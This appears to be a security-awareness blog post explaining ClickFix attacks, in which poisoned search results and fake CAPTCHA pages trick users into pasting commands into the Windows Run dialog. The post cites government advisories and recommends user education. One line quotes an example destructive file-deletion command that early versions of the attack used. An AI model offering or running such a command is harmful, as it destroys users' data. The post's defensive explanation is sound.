ClickFix attacks have been around for decades; only the name is new.
ClickFix attacks use social engineering to trick users into clicking on buttons and links that the user is told are needed so their browser or computer can perform some desired action.
The most common type of ClickFix attack example, and where the name itself comes from, is where a user intentionally searches for some sort of computer error they are having…say Windows error 1F0039a (I made that up), and the browser engine returns lots of links regarding that error.
Unbeknownst to the user, the internet search engine results have been gamed (i.e., “poisoned”) so that a simple search for a solution returns a malicious website high up in the results. Usually, the attacker has either created a fake website with the error message embedded in the website over and over (but not visible to users), or they have paid the search engine vendor to have their website returned when that particular keyword is searched on. Either way, the attacker’s website link ends up high on the list of websites with solutions.
When the user goes to the malicious website, the scammer attempts to social engineer the user into performing an action that is against the user’s best interests. In most cases, it’s to click a button to fix something (hence, the “ClickFix” name). Sometimes the button click takes the user to another malicious website, sometimes it downloads a malicious document or content, and sometimes it brings up instructions that the user is supposed to copy and run on their computer.
Decades ago, early versions of the latter type of ClickFix attack would have the user type in some short command, like ‘\del. /e/s/f/q && Y’ or something similar, which would delete a lot of important operating system files and make the user’s system quickly unusable.
Today’s ClickFix attacks want control of the user’s system, not destruction. The commands they want the user to run are longer and more involved. Hence, they instruct the user to copy the command and execute it on the user’s desktop. If the user follows the instructions and executes the command, the attacker usually gains remote access to the victim’s computers.
It’s pretty dastardly.
A very common ClickFix attack is where the user is taken to a malicious website and then purportedly shown a CAPTCHA dialog box that they must click on to “prove they are human.”
We’ve all seen those legitimate prompts. You click on them, and then you are validated and allowed onto the website. With ClickFix sites, you are then given some text to copy and run on your system. The instructions usually tell the user to type Ctrl-R (which opens the Run dialog box in Windows) followed by Ctrl-V, which copies the malicious code from the malicious website and pastes it into the now open Run prompt.
Although some of the ClickFix attacks are readily apparent, others are a little more sneaky. Here are some great ClickFix examples from a cyber advisory from the US Department of Health and Human Services (https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf)
Brian Krebs did a great article on this type of ClickFix example here.
The Cybersecurity and Infrastructure Security Agency (CISA) is warning of this exact type of attack again, this time as used by the Interlock ransomware gang. In the Interlock warning, CISA states, “This ClickFix technique has been used in several other malware campaigns, including Lumma Stealer and DarkGate.”
So, it’s being used more and more.
The examples I’ve talked about, along with Brian Krebs and CISA, are related to Microsoft Windows, but similar types of attacks can be accomplished on all computer operating systems with slight changes.
ClickFix attacks can be difficult to stop because the commands being typed in are hard for endpoint detection and response software to detect and stop.
You can try to disable the ability for users to get to command prompts, but it can be difficult because doing so often blocks a lot of legitimate processes (which use command prompts in the background to operate).
You should educate your users about these types of attacks so that they know that copying text from a website and running it on their computer can be harmful.
A little education goes a long way.
